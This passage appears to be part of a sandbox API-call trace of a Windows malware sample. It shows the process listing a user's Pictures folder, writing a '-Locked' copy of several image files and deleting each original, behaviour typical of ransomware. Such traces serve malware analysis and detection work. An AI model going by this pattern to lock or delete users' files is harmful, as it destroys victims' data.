nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0303.399] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6111a40, ftCreationTime.dwHighDateTime=0x1d7d938, ftLastAccessTime.dwLowDateTime=0x1d770990, ftLastAccessTime.dwHighDateTime=0x1d7e3e7, ftLastWriteTime.dwLowDateTime=0x1d770990, ftLastWriteTime.dwHighDateTime=0x1d7e3e7, nFileSizeHigh=0x0, nFileSizeLow=0x15566, dwReserved0=0x0, dwReserved1=0x0, cFileName="cWtM6sPompJDNhYi.bmp", cAlternateFileName="CWTM6S~1.BMP")) returned 1 [0303.399] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0303.399] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14287cd0, ftCreationTime.dwHighDateTime=0x1d7db85, ftLastAccessTime.dwLowDateTime=0x2cfff700, ftLastAccessTime.dwHighDateTime=0x1d7dd7a, ftLastWriteTime.dwLowDateTime=0x2cfff700, ftLastWriteTime.dwHighDateTime=0x1d7dd7a, nFileSizeHigh=0x0, nFileSizeLow=0xaee6, dwReserved0=0x0, dwReserved1=0x0, cFileName="f-BdV5SdU0Bq6dRLimk5.bmp", cAlternateFileName="F-BDV5~1.BMP")) returned 1 [0303.400] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26100080, ftCreationTime.dwHighDateTime=0x1d7d946, ftLastAccessTime.dwLowDateTime=0x89fc9670, ftLastAccessTime.dwHighDateTime=0x1d7e1a3, ftLastWriteTime.dwLowDateTime=0x89fc9670, ftLastWriteTime.dwHighDateTime=0x1d7e1a3, nFileSizeHigh=0x0, nFileSizeLow=0x10b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="JBjtDOPdC.jpg", cAlternateFileName="JBJTDO~1.JPG")) returned 1 [0303.400] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce85b280, ftCreationTime.dwHighDateTime=0x1d7e528, ftLastAccessTime.dwLowDateTime=0xea987400, ftLastAccessTime.dwHighDateTime=0x1d7e73d, ftLastWriteTime.dwLowDateTime=0xea987400, ftLastWriteTime.dwHighDateTime=0x1d7e73d, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ju9W4N8R3NHzR1k.png", cAlternateFileName="JU9W4N~1.PNG")) returned 1 [0303.400] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73479290, ftCreationTime.dwHighDateTime=0x1d7e068, ftLastAccessTime.dwLowDateTime=0x7c51f90, ftLastAccessTime.dwHighDateTime=0x1d7e0c4, ftLastWriteTime.dwLowDateTime=0x7c51f90, ftLastWriteTime.dwHighDateTime=0x1d7e0c4, nFileSizeHigh=0x0, nFileSizeLow=0x21e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONjt5so8gB0htr9SLu.jpg", cAlternateFileName="ONJT5S~1.JPG")) returned 1 [0303.401] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf57f8ad0, ftCreationTime.dwHighDateTime=0x1d7dc06, ftLastAccessTime.dwLowDateTime=0xc8c44f20, ftLastAccessTime.dwHighDateTime=0x1d7debe, ftLastWriteTime.dwLowDateTime=0xc8c44f20, ftLastWriteTime.dwHighDateTime=0x1d7debe, nFileSizeHigh=0x0, nFileSizeLow=0x98a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ovrZpwsZ9oIx2.png", cAlternateFileName="OVRZPW~1.PNG")) returned 1 [0303.401] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41c324b0, ftCreationTime.dwHighDateTime=0x1d7dc3e, ftLastAccessTime.dwLowDateTime=0x50496e10, ftLastAccessTime.dwHighDateTime=0x1d7e60a, ftLastWriteTime.dwLowDateTime=0x50496e10, ftLastWriteTime.dwHighDateTime=0x1d7e60a, nFileSizeHigh=0x0, nFileSizeLow=0x121e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="QNrRte.png", cAlternateFileName="")) returned 1 [0303.401] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0303.401] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b02ae90, ftCreationTime.dwHighDateTime=0x1d7db7e, ftLastAccessTime.dwLowDateTime=0xe06af00, ftLastAccessTime.dwHighDateTime=0x1d7e2c6, ftLastWriteTime.dwLowDateTime=0xe06af00, ftLastWriteTime.dwHighDateTime=0x1d7e2c6, nFileSizeHigh=0x0, nFileSizeLow=0x2d26, dwReserved0=0x0, dwReserved1=0x0, cFileName="soGL3VvH3.jpg", cAlternateFileName="SOGL3V~1.JPG")) returned 1 [0303.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efbcc30, ftCreationTime.dwHighDateTime=0x1d7e075, ftLastAccessTime.dwLowDateTime=0xeee32ed0, ftLastAccessTime.dwHighDateTime=0x1d7e605, ftLastWriteTime.dwLowDateTime=0xeee32ed0, ftLastWriteTime.dwHighDateTime=0x1d7e605, nFileSizeHigh=0x0, nFileSizeLow=0xde2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQi0H8EC.jpg", cAlternateFileName="")) returned 1 [0303.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29092a90, ftCreationTime.dwHighDateTime=0x1d7e5ef, ftLastAccessTime.dwLowDateTime=0x886dcf50, ftLastAccessTime.dwHighDateTime=0x1d7e765, ftLastWriteTime.dwLowDateTime=0x886dcf50, ftLastWriteTime.dwHighDateTime=0x1d7e765, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="u6iPBC1t5.gif", cAlternateFileName="U6IPBC~1.GIF")) returned 1 [0303.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ec2370, ftCreationTime.dwHighDateTime=0x1d7d891, ftLastAccessTime.dwLowDateTime=0xb6e42680, ftLastAccessTime.dwHighDateTime=0x1d7dfe1, ftLastWriteTime.dwLowDateTime=0xb6e42680, ftLastWriteTime.dwHighDateTime=0x1d7dfe1, nFileSizeHigh=0x0, nFileSizeLow=0x44b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uy1att05vGLsri.png", cAlternateFileName="UY1ATT~1.PNG")) returned 1 [0303.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa04425a0, ftCreationTime.dwHighDateTime=0x1d7dd03, ftLastAccessTime.dwLowDateTime=0x2963dc60, ftLastAccessTime.dwHighDateTime=0x1d7e1cb, ftLastWriteTime.dwLowDateTime=0x2963dc60, ftLastWriteTime.dwHighDateTime=0x1d7e1cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vtWu-", cAlternateFileName="")) returned 1 [0303.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30b4f80, ftCreationTime.dwHighDateTime=0x1d7d799, ftLastAccessTime.dwLowDateTime=0x32a60f90, ftLastAccessTime.dwHighDateTime=0x1d7e3f7, ftLastWriteTime.dwLowDateTime=0x32a60f90, ftLastWriteTime.dwHighDateTime=0x1d7e3f7, nFileSizeHigh=0x0, nFileSizeLow=0xf452, dwReserved0=0x0, dwReserved1=0x0, cFileName="VVbwcj.jpg", cAlternateFileName="")) returned 1 [0303.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c73cf60, ftCreationTime.dwHighDateTime=0x1d7df91, ftLastAccessTime.dwLowDateTime=0x3c24f220, ftLastAccessTime.dwHighDateTime=0x1d7e2f8, ftLastWriteTime.dwLowDateTime=0x3c24f220, ftLastWriteTime.dwHighDateTime=0x1d7e2f8, nFileSizeHigh=0x0, nFileSizeLow=0x833a, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0o USyk.gif", cAlternateFileName="X0OUSY~1.GIF")) returned 1 [0303.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc5b7f40, ftCreationTime.dwHighDateTime=0x1d7dbdc, ftLastAccessTime.dwLowDateTime=0x789393a0, ftLastAccessTime.dwHighDateTime=0x1d7e308, ftLastWriteTime.dwLowDateTime=0x789393a0, ftLastWriteTime.dwHighDateTime=0x1d7e308, nFileSizeHigh=0x0, nFileSizeLow=0x37c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="xDBEu.png", cAlternateFileName="")) returned 1 [0303.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304d0990, ftCreationTime.dwHighDateTime=0x1d7dc92, ftLastAccessTime.dwLowDateTime=0xf8112660, ftLastAccessTime.dwHighDateTime=0x1d7df20, ftLastWriteTime.dwLowDateTime=0xf8112660, ftLastWriteTime.dwHighDateTime=0x1d7df20, nFileSizeHigh=0x0, nFileSizeLow=0x12438, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg", cAlternateFileName="YSFBKF~1.JPG")) returned 1 [0303.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304d0990, ftCreationTime.dwHighDateTime=0x1d7dc92, ftLastAccessTime.dwLowDateTime=0xf8112660, ftLastAccessTime.dwHighDateTime=0x1d7df20, ftLastWriteTime.dwLowDateTime=0xf8112660, ftLastWriteTime.dwHighDateTime=0x1d7df20, nFileSizeHigh=0x0, nFileSizeLow=0x12438, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg", cAlternateFileName="YSFBKF~1.JPG")) returned 0 [0303.404] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0303.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0303.406] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked", lpFilePart=0x0) returned 0x3c [0303.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.406] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\-yrcasxslfeumfue0u.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.414] GetFileType (hFile=0x49c) returned 0x1 [0303.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.415] GetFileType (hFile=0x49c) returned 0x1 [0303.418] CloseHandle (hObject=0x49c) returned 1 [0303.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp", lpFilePart=0x0) returned 0x35 [0303.419] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\-yrcasxslfeumfue0u.bmp")) returned 1 [0303.475] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked", lpFilePart=0x0) returned 0x3e [0303.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.476] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0vxzeqdcrdwwvteowajx.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.476] GetFileType (hFile=0x49c) returned 0x1 [0303.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.477] GetFileType (hFile=0x49c) returned 0x1 [0303.479] CloseHandle (hObject=0x49c) returned 1 [0303.479] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp", lpFilePart=0x0) returned 0x37 [0303.479] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0vxzeqdcrdwwvteowajx.bmp")) returned 1 [0303.501] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked", lpFilePart=0x0) returned 0x30 [0303.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.502] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1a-5t7.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.502] GetFileType (hFile=0x49c) returned 0x1 [0303.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.504] GetFileType (hFile=0x49c) returned 0x1 [0303.516] CloseHandle (hObject=0x49c) returned 1 [0303.517] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png", lpFilePart=0x0) returned 0x29 [0303.517] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1a-5t7.png")) returned 1 [0303.533] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked", lpFilePart=0x0) returned 0x3b [0303.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.534] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1rehjaucqfs c9jbp.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.534] GetFileType (hFile=0x49c) returned 0x1 [0303.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.534] GetFileType (hFile=0x49c) returned 0x1 [0303.537] CloseHandle (hObject=0x49c) returned 1 [0303.545] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg", lpFilePart=0x0) returned 0x34 [0303.546] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1rehjaucqfs c9jbp.jpg")) returned 1 [0303.552] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked", lpFilePart=0x0) returned 0x3d [0303.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.552] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3cpzt7pcztidxfhrdlk.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.554] GetFileType (hFile=0x49c) returned 0x1 [0303.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.554] GetFileType (hFile=0x49c) returned 0x1 [0303.563] CloseHandle (hObject=0x49c) returned 1 [0303.564] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png", lpFilePart=0x0) returned 0x36 [0303.564] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3cpzt7pcztidxfhrdlk.png")) returned 1 [0303.621] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked", lpFilePart=0x0) returned 0x38 [0303.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.621] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7krbdwyoztkahw.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.623] GetFileType (hFile=0x49c) returned 0x1 [0303.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.623] GetFileType (hFile=0x49c) returned 0x1 [0303.643] CloseHandle (hObject=0x49c) returned 1 [0303.644] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif", lpFilePart=0x0) returned 0x31 [0303.644] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7krbdwyoztkahw.gif")) returned 1 [0303.651] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked", lpFilePart=0x0) returned 0x3a [0303.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.651] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\cwtm6spompjdnhyi.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.653] GetFileType (hFile=0x49c) returned 0x1 [0303.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.653] GetFileType (hFile=0x49c) returned 0x1 [0303.655] CloseHandle (hObject=0x49c) returned 1 [0303.656] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp", lpFilePart=0x0) returned 0x33 [0303.656] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\cwtm6spompjdnhyi.bmp")) returned 1 [0303.660] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0303.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.661] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.665] GetFileType (hFile=0x49c) returned 0x1 [0303.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.665] GetFileType (hFile=0x49c) returned 0x1 [0303.675] CloseHandle (hObject=0x49c) returned 1 [0303.676] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x2a [0303.676] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini")) returned 1 [0303.677] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked", lpFilePart=0x0) returned 0x3e [0303.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.677] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f-bdv5sdu0bq6drlimk5.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.678] GetFileType (hFile=0x49c) returned 0x1 [0303.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.678] GetFileType (hFile=0x49c) returned 0x1 [0303.681] CloseHandle (hObject=0x49c) returned 1 [0303.682] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp", lpFilePart=0x0) returned 0x37 [0303.682] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f-bdv5sdu0bq6drlimk5.bmp")) returned 1 [0303.693] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked", lpFilePart=0x0) returned 0x33 [0303.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.693] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jbjtdopdc.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.694] GetFileType (hFile=0x49c) returned 0x1 [0303.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.694] GetFileType (hFile=0x49c) returned 0x1 [0303.700] CloseHandle (hObject=0x49c) returned 1 [0303.700] 